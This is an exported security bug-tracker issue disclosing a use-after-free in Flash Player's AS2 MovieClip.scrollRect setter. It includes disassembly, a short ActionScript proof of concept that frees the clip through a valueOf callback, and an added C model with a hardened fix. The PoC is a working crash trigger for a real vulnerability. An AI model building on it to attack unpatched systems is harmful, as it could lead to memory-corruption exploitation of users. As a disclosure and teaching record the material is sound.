AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research

Flash UAF with MovieClip.scrollRect in AS2 #359

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]

---
VULNERABILITY DETAILS
When setting the scrollRect attribute of a MovieClip in AS2 with a custom 
Rectangle, it is possible to free the MovieClip while a reference to it 
remains on the stack.

VERSION
Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
The PoC below targets the MovieClip.scrollRect property. While setting this 
attribute with a custom Rectangle, it is possible to trigger a use-after-free 
by freeing the targeted MovieClip. Creating a TextField at the same depth as 
the targeted MovieClip is enough to free the object and make Flash crash.

These lines come from the standalone Flash Player 17.0.0.169:

.text:00597F45 loc_597F45:
.text:00597F45                 cmp     eax, 6
.text:00597F48                 jnz     loc_597FE5
.text:00597F4E                 mov     ecx, esi            ; esi points to the MovieClip object
.text:00597F50                 call    sub_40C1ED
.text:00597F55                 add     eax, 30Ch
.text:00597F5A                 or      dword ptr [eax], 8
.text:00597F5D                 mov     eax, [ebx]
.text:00597F5F                 mov     byte ptr [eax+82Ch], 1
.text:00597F66                 mov     ecx, [ebx]
.text:00597F68                 lea     eax, [ebp+74h+var_1C0]
.text:00597F6E                 push    eax
.text:00597F6F                 push    dword ptr [ebx+0Ch]
.text:00597F72                 call    xfetchRectangleProperties ; get the Rectangle properties, and execute some AS2
.text:00597F77                 test    al, al
.text:00597F79                 jz      loc_598274
.text:00597F7F                 mov     edi, [ebp+74h+var_1C0]
.text:00597F85                 mov     ecx, esi
.text:00597F87                 imul    edi, 14h
.text:00597F8A                 call    sub_40C1ED          ; references freed memory and returns a bad pointer
.text:00597F8F                 mov     [eax+310h], edi     ; crash here, eax = 0

PoC (compile with Flash CS5.5):

import flash.geom.Rectangle

// Object whose valueOf runs script while the native setter is converting
// the Rectangle's x property to a number
var o2 = {}
o2.valueOf = function () {
    // Placing a TextField at depth 1 replaces newmc and frees it while the
    // setter still holds its pointer
    _global.mc.createTextField("newtf", 1, 1, 1, 2, 3)
    return 7
}
// Rectangle-like object: x triggers the callback, the rest are plain numbers
var o = {x:o2, y:0, width:4, height:5}

_global.mc = this
// Target MovieClip, created at depth 1
var newmc:MovieClip = this.createEmptyMovieClip("newmc", 1)
// The native setter fetches the properties (running valueOf), then writes to newmc
newmc.scrollRect = o

---

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by cev...@google.com on 1 May 2015 at 10:11

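The pattern in the report, a native setter that re-enters script while converting a property and then keeps using a pointer the script was able to free, as an added C model. This is not Flash Player code and not part of the original report: the display list, the reference-counted pool with a `freed` flag standing in for the allocator, and every function and field name are assumptions made for illustration. The vulnerable setter mirrors the disassembly above (fetch the Rectangle properties, then write through the stale MovieClip pointer); the hardened variant pins the clip across the script call and re-checks that it is still on the display list before writing.

```c
/* Added example: a model of the scrollRect re-entrancy bug, not Flash code.
 * All names and structures below are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 4

/* Simplified MovieClip. `freed` stands in for the allocator: once set, the
 * object is conceptually gone and any write to it is a use-after-free. */
typedef struct MovieClip {
    int freed;
    int refcount;
    int depth;
    int scroll_x, scroll_y, scroll_w, scroll_h;
} MovieClip;

/* Display list, one slot per depth (createEmptyMovieClip and createTextField
 * share the depth space). A static pool replaces malloc so the model stays
 * deterministic and the "freed" object remains readable for instrumentation. */
static MovieClip *g_display_list[MAX_DEPTH];
static MovieClip  g_pool[MAX_DEPTH];

/* A script value whose numeric conversion may run a valueOf hook. */
typedef struct {
    int value;
    void (*valueOf)(void);              /* NULL means a plain number */
} ScriptNumber;

typedef struct { ScriptNumber x, y, width, height; } ScriptRect;

static MovieClip *create_empty_movie_clip(int depth) {
    MovieClip *mc = &g_pool[depth];
    memset(mc, 0, sizeof *mc);
    mc->depth = depth;
    mc->refcount = 1;                   /* the display list owns it */
    g_display_list[depth] = mc;
    return mc;
}

static void release(MovieClip *mc) {
    if (--mc->refcount == 0) {
        mc->freed = 1;                  /* real code would free() here */
        mc->scroll_x = mc->scroll_y = mc->scroll_w = mc->scroll_h = -1;
    }
}

/* createTextField(name, depth, ...): whatever sits at `depth` is detached and
 * loses its reference, which is exactly what the PoC's valueOf does. */
static void create_text_field(int depth) {
    MovieClip *old = g_display_list[depth];
    g_display_list[depth] = NULL;       /* the TextField itself is not modelled */
    if (old) release(old);
}

/* Stand-in for xfetchRectangleProperties: converting each property to a
 * number can re-enter script before the setter continues. */
static int fetch_number(const ScriptNumber *n) {
    if (n->valueOf) n->valueOf();
    return n->value;
}

static void fetch_rect(const ScriptRect *r, int out[4]) {
    out[0] = fetch_number(&r->x);
    out[1] = fetch_number(&r->y);
    out[2] = fetch_number(&r->width);
    out[3] = fetch_number(&r->height);
}

/* Vulnerable setter: keeps the raw `mc` pointer across the script call and
 * writes through it afterwards. Returns 1 if it wrote into a freed object. */
static int set_scroll_rect_vulnerable(MovieClip *mc, const ScriptRect *r) {
    int v[4];
    fetch_rect(r, v);                   /* script may free mc here */
    int uaf = mc->freed;
    mc->scroll_x = v[0]; mc->scroll_y = v[1];
    mc->scroll_w = v[2]; mc->scroll_h = v[3];
    return uaf;
}

/* Hardened setter: holds its own reference while script runs, then checks that
 * the clip is still on the display list before touching it.
 * Returns 0 on success, -1 if the clip was detached during the callback. */
static int set_scroll_rect_hardened(MovieClip *mc, const ScriptRect *r) {
    int v[4];
    mc->refcount++;                     /* pin mc for the duration */
    fetch_rect(r, v);
    int attached = (g_display_list[mc->depth] == mc);
    if (attached) {
        mc->scroll_x = v[0]; mc->scroll_y = v[1];
        mc->scroll_w = v[2]; mc->scroll_h = v[3];
    }
    release(mc);                        /* frees now if script detached it */
    return attached ? 0 : -1;
}

/* The PoC's o2.valueOf: create a TextField at the target's depth. */
static void evil_value_of(void) { create_text_field(1); }
static const ScriptRect POC_RECT = { {7, evil_value_of}, {0, NULL}, {4, NULL}, {5, NULL} };
static const ScriptRect PLAIN_RECT = { {7, NULL}, {0, NULL}, {4, NULL}, {5, NULL} };

int run_vulnerable(void) {              /* expected: 1 (write into freed clip) */
    memset(g_display_list, 0, sizeof g_display_list);
    return set_scroll_rect_vulnerable(create_empty_movie_clip(1), &POC_RECT);
}

int run_hardened(void) {                /* expected: -1 (write refused) */
    memset(g_display_list, 0, sizeof g_display_list);
    return set_scroll_rect_hardened(create_empty_movie_clip(1), &POC_RECT);
}

int run_benign(void) {                  /* expected: 7 (plain numbers, x stored) */
    memset(g_display_list, 0, sizeof g_display_list);
    MovieClip *newmc = create_empty_movie_clip(1);
    set_scroll_rect_hardened(newmc, &PLAIN_RECT);
    return newmc->scroll_x;
}

int main(void) {
    printf("vulnerable: %d  hardened: %d  benign x: %d\n",
           run_vulnerable(), run_hardened(), run_benign());
    return 0;
}
```

The model makes the dangling write observable through the `freed` flag; in the real binary the same stale `esi` is passed to sub_40C1ED, which reads through the freed object and hands back the bad pointer that the `mov [eax+310h], edi` dereferences. The fix in the hardened variant is the usual one for script-re-entrant native setters: take a reference before any call that can run script, and re-validate the object's state after it returns instead of trusting a pointer captured beforehand.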

GoogleCodeExporter commented 8 years ago
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

Original comment by cev...@google.com on 1 May 2015 at 10:13

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 May 2015 at 8:06

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:51

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 18 Aug 2015 at 7:17